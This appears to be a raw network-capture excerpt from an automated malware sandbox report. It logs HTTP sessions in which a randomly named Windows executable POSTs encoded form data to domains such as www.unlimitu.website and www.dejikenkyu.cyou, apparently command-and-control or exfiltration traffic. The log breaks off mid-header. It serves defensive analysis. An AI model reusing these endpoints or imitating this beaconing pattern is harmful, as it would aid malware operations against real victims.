                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.949982209.74.79.40805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:06:14.845164061 CET1794OUTPOST /bhgd/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.unlimitu.website
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.unlimitu.website
                                                          Referer: http://www.unlimitu.website/bhgd/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 4f 79 61 7a 4c 52 50 39 5a 57 78 74 49 6a 74 30 4e 39 72 65 31 6f 74 78 70 32 62 39 51 57 55 39 6d 57 4d 6a 71 74 50 69 58 4a 50 72 64 6c 76 38 51 50 71 57 37 41 72 5a 54 4e 59 64 2b 57 38 2b 6c 33 73 53 45 4c 77 69 42 49 35 52 43 34 4b 6f 72 67 68 65 35 38 45 36 55 7a 37 72 49 65 5a 57 2f 52 4e 42 51 41 46 42 47 2f 47 39 59 45 56 44 42 2f 64 65 44 57 74 2f 43 71 79 48 4c 76 6c 35 4e 63 4b 4a 50 43 45 45 44 45 65 30 55 78 2b 55 2f 77 75 7a 62 56 7a 66 39 35 41 33 53 6d 79 48 4e 39 44 6b 32 35 31 6a 2b 47 4f 62 7a 32 41 4f 6b 5a 6a 35 4b 58 66 68 30 6b 36 4a 35 4c 5a 59 78 77 4b 52 56 6f 4d 73 6e 76 30 42 32 47 4f 76 74 4b 59 37 4f 75 56 63 4c 63 67 36 6e 71 63 6b 74 34 4c 33 70 4d 51 68 4e 56 64 33 4e 68 49 31 68 43 77 56 4c 42 66 62 73 66 51 51 30 4f 7a 39 70 66 71 6b 76 34 6f 57 42 39 43 41 4c 31 65 6c 48 52 38 70 46 30 6e 46 54 6c 34 77 79 4a 4c 37 4a 37 75 46 4f 46 4d 39 63 66 41 56 64 34 48 47 68 45 4f 73 4c 35 6d 78 78 63 68 47 66 79 39 62 33 57 77 67 72 4f 32 6e 59 46 [TRUNCATED]
                                                          Data Ascii: bdi02je=OyazLRP9ZWxtIjt0N9re1otxp2b9QWU9mWMjqtPiXJPrdlv8QPqW7ArZTNYd+W8+l3sSELwiBI5RC4Korghe58E6Uz7rIeZW/RNBQAFBG/G9YEVDB/deDWt/CqyHLvl5NcKJPCEEDEe0Ux+U/wuzbVzf95A3SmyHN9Dk251j+GObz2AOkZj5KXfh0k6J5LZYxwKRVoMsnv0B2GOvtKY7OuVcLcg6nqckt4L3pMQhNVd3NhI1hCwVLBfbsfQQ0Oz9pfqkv4oWB9CAL1elHR8pF0nFTl4wyJL7J7uFOFM9cfAVd4HGhEOsL5mxxchGfy9b3WwgrO2nYFAtChd4PuzDn87BC/hsJcfM/Tv/S7uGvs8i65lI25b8KRtMpnN1jyLvnaU2bHvmhmfuHtAM4XVk/rsOaDv0j4wE8oUCK7PiMZhffjPaJsxpv8E9T4IAnKehqgM0RW9+0ZRC+ZtxSD+8iK0U4gjol3TkiOdX7lDAkZu4KXxAuDSBRBQ6tCHRmwi6QEOvnOo/ek5IGrb+AkRW7dq21RhsFL8zARu0i33xO5V0E3cFldOnKfncWF9ZZuzDabOyvidqrY/ZH1q0DGw2iA+GrlaFejOVCjSSGHyCEhfC8Zr0CMN9I8Fa40oQpoh6s7L3CBPyDJCcDMZ9XUGVcllht5RMSeHU0miGkSbnnkoKwSMcXr+EUx43tzWVSk/cHu5x3zOP7rsO7yMAo4oC4J53DvjEUlvCsglxSPMtFrmNkCw4gcg/7VOqPCxMjj8jOIy7R2IBGkBO3L4ShzB+wIO5lz9360MidJ83xB3cMQtQDZOg1UGyAVq18sLv1brKuxV5c8diww+tjhlR2OpZV+bO3WNSggxEbkYmx4yVDtSHcG3p6llnQY+UBnW8z9IJi1tlWSEUg3si6GiF2iD58aUgWbEaz+L0jQu6w3eCzMVvHH4nX3u4cnMv8cNmlXRHxgdzQKDEWqBHSy44PSAEgLAxENJP3rsyDCXo9wmj7k0H [TRUNCATED]
                                                          Jan 10, 2025 23:06:15.413546085 CET533INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:06:15 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.949983209.74.79.40805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:06:17.386873007 CET485OUTGET /bhgd/?bdi02je=DwyTInzmM2N6MB8bA7Kl2rVP63jkNCBYgQInoYuWZdnLNHmEAu6R7FKnDf8o91RvtQ4ecsZhKZdUKJWxgxNcuNlYaUz0Gu0z3h0NSBZTW/WoATRTDg==&dZOh=OjIxv4 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.unlimitu.website
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:06:17.983237982 CET548INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:06:17 GMT
                                                          Server: Apache
                                                          Content-Length: 389
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.949984104.21.96.1805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:06:37.283664942 CET754OUTPOST /58m5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.dejikenkyu.cyou
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.dejikenkyu.cyou
                                                          Referer: http://www.dejikenkyu.cyou/58m5/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 51 33 42 41 47 53 39 66 30 6f 32 63 78 30 64 64 69 73 59 55 45 39 7a 50 75 64 43 51 65 75 37 30 2f 69 66 7a 44 4d 4e 4c 45 79 54 66 51 54 63 4b 6c 66 57 41 32 56 41 6a 6d 41 75 72 76 64 59 34 38 35 64 79 36 69 65 4b 78 6b 36 43 52 65 76 4c 46 7a 55 71 64 73 39 62 41 37 4b 4a 52 51 44 5a 6b 6d 64 45 2b 5a 6d 49 47 43 56 6b 48 44 79 48 66 38 2f 53 77 6d 2b 34 58 55 48 61 76 71 51 79 66 6d 79 71 35 71 41 73 31 4e 5a 48 68 2f 62 70 77 63 75 4b 33 50 48 36 65 31 49 70 76 64 34 4e 58 5a 76 61 72 68 71 52 4c 5a 42 6e 4b 4e 72 32 35 43 2f 31 4d 4a 59 77 4d 4b 6e 48
                                                          Data Ascii: bdi02je=Q3BAGS9f0o2cx0ddisYUE9zPudCQeu70/ifzDMNLEyTfQTcKlfWA2VAjmAurvdY485dy6ieKxk6CRevLFzUqds9bA7KJRQDZkmdE+ZmIGCVkHDyHf8/Swm+4XUHavqQyfmyq5qAs1NZHh/bpwcuK3PH6e1Ipvd4NXZvarhqRLZBnKNr25C/1MJYwMKnH
                                                          Jan 10, 2025 23:06:38.221787930 CET1236INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 10 Jan 2025 22:06:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-powered-by: PHP/7.4.33
                                                          x-dns-prefetch-control: on
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          x-content-type-options: nosniff
                                                          x-frame-options: SAMEORIGIN
                                                          x-xss-protection: 1; mode=block
                                                          strict-transport-security: max-age=31536000;
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          x-litespeed-tag: 2ba_HTTP.404,2ba_HTTP.301
                                                          x-redirect-by: WordPress - Really Simple Security
                                                          location: https://www.dejikenkyu.cyou/58m5/
                                                          x-litespeed-cache-control: no-cache
                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=df7kPOZ9cskvuTWt4nFk8vX5LFGkcLcdMYjksjnhIyMAmJu5jB1EEPh5VVv8BdBSlIgEbnhA%2BabKkIJHpSXpENw1v3JKgxSLIo8iZhIiCUNW1JAT3Ge8%2F7i%2B3prAhjkwU0JsSbi%2B"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffff9ad9db772a4-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1988&rtt_var=994&sent=1&recv=3&los
                                                          Data Raw:
                                                          Data Ascii:
                                                          Jan 10, 2025 23:06:38.221834898 CET120INData Raw: 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72 65 63 76 5f 62 79 74 65 73 3d 37 35 34 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 30 26 63 77 6e 64 3d 32 31 30 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63
                                                          Data Ascii: =0&retrans=0&sent_bytes=0&recv_bytes=754&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.949985104.21.96.1805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:06:39.830147982 CET778OUTPOST /58m5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.dejikenkyu.cyou
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.dejikenkyu.cyou
                                                          Referer: http://www.dejikenkyu.cyou/58m5/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 51 33 42 41 47 53 39 66 30 6f 32 63 77 58 56 64 35 4c 73 55 56 64 7a 4d 6c 39 43 51 58 4f 37 76 2f 69 54 7a 44 4a 74 68 48 41 6e 66 51 33 59 4b 2f 61 71 41 34 31 41 6a 75 67 75 79 68 39 5a 30 38 35 5a 41 36 69 79 4b 78 69 57 43 52 62 54 4c 46 6b 41 70 50 4d 39 5a 49 62 4b 4c 56 51 44 5a 6b 6d 64 45 2b 64 32 69 47 43 4e 6b 41 79 43 48 65 64 2f 52 73 32 2b 37 57 55 48 61 6c 36 51 32 66 6d 7a 39 35 72 4d 47 31 50 52 48 68 2f 72 70 77 4a 53 46 35 50 48 34 61 31 4a 64 6b 64 59 49 4d 72 58 51 71 77 4b 34 65 5a 56 50 45 4d 58 6f 6f 77 32 75 5a 65 59 58 4c 74 75 76 6a 35 34 47 67 49 68 45 52 54 68 6a 78 39 4d 77 4c 39 44 6b 4d 41 3d 3d
                                                          Data Ascii: bdi02je=Q3BAGS9f0o2cwXVd5LsUVdzMl9CQXO7v/iTzDJthHAnfQ3YK/aqA41Ajuguyh9Z085ZA6iyKxiWCRbTLFkApPM9ZIbKLVQDZkmdE+d2iGCNkAyCHed/Rs2+7WUHal6Q2fmz95rMG1PRHh/rpwJSF5PH4a1JdkdYIMrXQqwK4eZVPEMXoow2uZeYXLtuvj54GgIhERThjx9MwL9DkMA==
                                                          Jan 10, 2025 23:06:40.733803034 CET1236INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 10 Jan 2025 22:06:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-powered-by: PHP/7.4.33
                                                          x-dns-prefetch-control: on
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          x-content-type-options: nosniff
                                                          x-frame-options: SAMEORIGIN
                                                          x-xss-protection: 1; mode=block
                                                          strict-transport-security: max-age=31536000;
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          x-litespeed-tag: 2ba_HTTP.404,2ba_HTTP.301
                                                          x-redirect-by: WordPress - Really Simple Security
                                                          location: https://www.dejikenkyu.cyou/58m5/
                                                          x-litespeed-cache-control: no-cache
                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ojwNLhQg4VudMxG956nDxz5uLcw3lBQT4%2FxfJLXY8gMM4LjQhip4lJzWDu403Hx9v0AzNZ4ncQ%2F1xzQTQXAC8RBYODw895lY7fn4EKv0LlG6G2xCSjMJwvMqnvW6yPkbROustMgB"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffff9bd6a2b72a4-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2005&min_rtt=2005&rtt_var=1002&sent=1&recv=3&lost=0
                                                          Data Raw:
                                                          Data Ascii:
                                                          Jan 10, 2025 23:06:40.733850956 CET117INData Raw: 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72 65 63 76 5f 62 79 74 65 73 3d 37 37 38 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 30 26 63 77 6e 64 3d 32 31 30 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d
                                                          Data Ascii: retrans=0&sent_bytes=0&recv_bytes=778&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.949986104.21.96.1805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:06:42.422694921 CET1791OUTPOST /58m5/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.dejikenkyu.cyou
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.dejikenkyu.cyou
                                                          Referer: http://www.dejikenkyu.cyou/58m5/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 51 33 42 41 47 53 39 66 30 6f 32 63 77 58 56 64 35 4c 73 55 56 64 7a 4d 6c 39 43 51 58 4f 37 76 2f 69 54 7a 44 4a 74 68 48 41 2f 66 52 45 41 4b 38 39 2b 41 35 31 41 6a 67 41 75 33 68 39 59 75 38 39 4e 45 36 69 50 31 78 6e 4b 43 51 39 6e 4c 55 42 73 70 57 38 39 5a 58 72 4b 49 52 51 44 32 6b 69 35 41 2b 5a 53 69 47 43 4e 6b 41 78 61 48 59 4d 2f 52 75 32 2b 34 58 55 48 57 76 71 52 70 66 6d 37 74 35 72 49 38 31 62 64 48 68 66 37 70 7a 2f 47 46 6d 66 48 2b 57 56 4a 46 6b 64 56 59 4d 72 62 63 71 77 4f 57 65 62 56 50 48 49 2b 58 78 43 75 70 4c 59 41 6b 4c 72 6e 50 6c 65 49 66 36 4d 59 4d 50 43 39 2f 6b 4e 68 6e 50 65 6e 68 52 6f 41 38 38 36 6b 35 6e 4d 35 76 2b 4d 4d 54 52 71 6f 39 31 79 66 73 75 68 76 41 2b 39 57 4f 69 6c 5a 4f 4e 36 55 4d 31 4a 39 64 54 4d 2b 48 37 48 4e 47 4a 6e 7a 33 57 55 4e 62 37 73 35 63 46 73 30 64 6d 49 43 70 75 74 51 76 2f 68 58 6d 77 62 61 65 57 4b 47 7a 6f 57 67 39 66 75 70 66 66 42 56 75 6a 58 58 4b 33 6a 43 74 4d 6d 53 51 4d 77 44 58 72 4a 6c 52 30 44 [TRUNCATED]
                                                          Data Ascii: bdi02je=Q3BAGS9f0o2cwXVd5LsUVdzMl9CQXO7v/iTzDJthHA/fREAK89+A51AjgAu3h9Yu89NE6iP1xnKCQ9nLUBspW89ZXrKIRQD2ki5A+ZSiGCNkAxaHYM/Ru2+4XUHWvqRpfm7t5rI81bdHhf7pz/GFmfH+WVJFkdVYMrbcqwOWebVPHI+XxCupLYAkLrnPleIf6MYMPC9/kNhnPenhRoA886k5nM5v+MMTRqo91yfsuhvA+9WOilZON6UM1J9dTM+H7HNGJnz3WUNb7s5cFs0dmICputQv/hXmwbaeWKGzoWg9fupffBVujXXK3jCtMmSQMwDXrJlR0DYMnyHXEW4ShzPHHqXAycs7TdfT/nnp77w4Y21F/Zc9nidpOcLB+rJmCwzbVxPjz5ybRvGURDy3mck1oYhPy6V7XuR5GadbWuXNylpZJa73XR87SoYethuwaH1ZvUWBWb30MGs53lW8Gt4oxkHj+Vz+D6EfdY4Uf0LLnMq8AvBzBSQc7eemdObwGg1Ftm3FwucsF1GHcgE4Ebpsbjyzq8h1bn0Bi0CVrZODUjtKHUN3LsWdI4NLpGmtnzXEd+vq+UlKrdD2W3dZi/JVvEoWgodqt4fcFsyYCcPaivaRGaE5Qk5CspLg5tJOyepxvCLl66lES8seFqWZ8C75KwacD71zGF2W2Juzn1Q+rB5zCpCirYbkGtRllW23UerxmF7obTh4+agv8gvof6N5x1FhALGOPt88ZQthFQHQHK8ApGm2FtfZATyqv4A7eTof6Y8I19wCiyow0ZJXr9WMW1lS5X8vMD16je76fXj/eQhOyPwXNidEmAwEJ26X7i6iesolE1vFAZuOV2wwHcK4c5ssbYJWK0s8qeRz+puaF2X3qMa9paxbPZ14xbZuD95bJanoyrdyIPZLe9HkMXT6SHI0Ssi2k6M0/xj/SNeQs0AKLZUcOD8HYMT/eMG30ou55S2pcG6m1fpLk5HqhebJ95u7CvpvcxtlGvWvuXxZ [TRUNCATED]
                                                          Jan 10, 2025 23:06:43.329308987 CET1236INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 10 Jan 2025 22:06:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-powered-by: PHP/7.4.33
                                                          x-dns-prefetch-control: on
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          x-content-type-options: nosniff
                                                          x-frame-options: SAMEORIGIN
                                                          x-xss-protection: 1; mode=block
                                                          strict-transport-security: max-age=31536000;
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          x-litespeed-tag: 2ba_HTTP.404,2ba_HTTP.301
                                                          x-redirect-by: WordPress - Really Simple Security
                                                          location: https://www.dejikenkyu.cyou/58m5/
                                                          x-litespeed-cache-control: no-cache
                                                          cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sFSQO1u8LeIPvapOftdhJ0S8IcM7mQG%2BxIg9uhnZfi1Uq5%2BuiMteO1XerxlwMsiTpu3hCIJdFNJBqojoe4WCoCuBB%2FS%2Fr95wQ5gUGUDwfAsB2R6O1zN%2F98Ohuabj2hPBD91uii%2F4"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffff9cd8fb972a4-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1975&rtt_var=987&sent=1&recv=4
                                                          Data Raw:
                                                          Data Ascii:
                                                          Jan 10, 2025 23:06:43.329379082 CET125INData Raw: 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 72 65 63 76 5f 62 79 74 65 73 3d 31 37 39 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 30 26 63 77 6e 64 3d 32 31 30 26 75 6e 73 65 6e 74 5f 62 79 74 65
                                                          Data Ascii: lost=0&retrans=0&sent_bytes=0&recv_bytes=1791&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.949987104.21.96.1805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:06:44.967472076 CET484OUTGET /58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp+GE0WFWsNtmNdDn5tG/BYSJ7zzhJcA1CBHzR3dh5eCk2y1Rogmf0tN3zZBB6GTJ43iUX+nETgktO5t+JdjWSzaOjXca9ruuKiduGBOEEQ== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.dejikenkyu.cyou
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:06:45.893230915 CET1236INHTTP/1.1 301 Moved Permanently
                                                          Date: Fri, 10 Jan 2025 22:06:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-powered-by: PHP/7.4.33
                                                          x-dns-prefetch-control: on
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          x-content-type-options: nosniff
                                                          x-frame-options: SAMEORIGIN
                                                          x-xss-protection: 1; mode=block
                                                          strict-transport-security: max-age=31536000;
                                                          referrer-policy: strict-origin-when-cross-origin
                                                          x-redirect-by: WordPress - Really Simple Security
                                                          location: https://www.dejikenkyu.cyou/58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp+GE0WFWsNtmNdDn5tG/BYSJ7zzhJcA1CBHzR3dh5eCk2y1Rogmf0tN3zZBB6GTJ43iUX+nETgktO5t+JdjWSzaOjXca9ruuKiduGBOEEQ==
                                                          x-litespeed-cache: miss
                                                          x-turbo-charged-by: LiteSpeed
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2FbrrlOWAikviQPAtkf%2BIOBRQDOOa3wd4VJ8t6MIwrFG%2BHoahvocP2%2FcULui%2BpWd7Ja52N3WPksBIxL%2F6LdF%2BCyuib9oidczLbdeZqmfKFKxRTJasQA1u9v5UPf6pJ%2B6VRSC%2FeO0"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffff9dd8cc14363-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-
                                                          Data Raw:
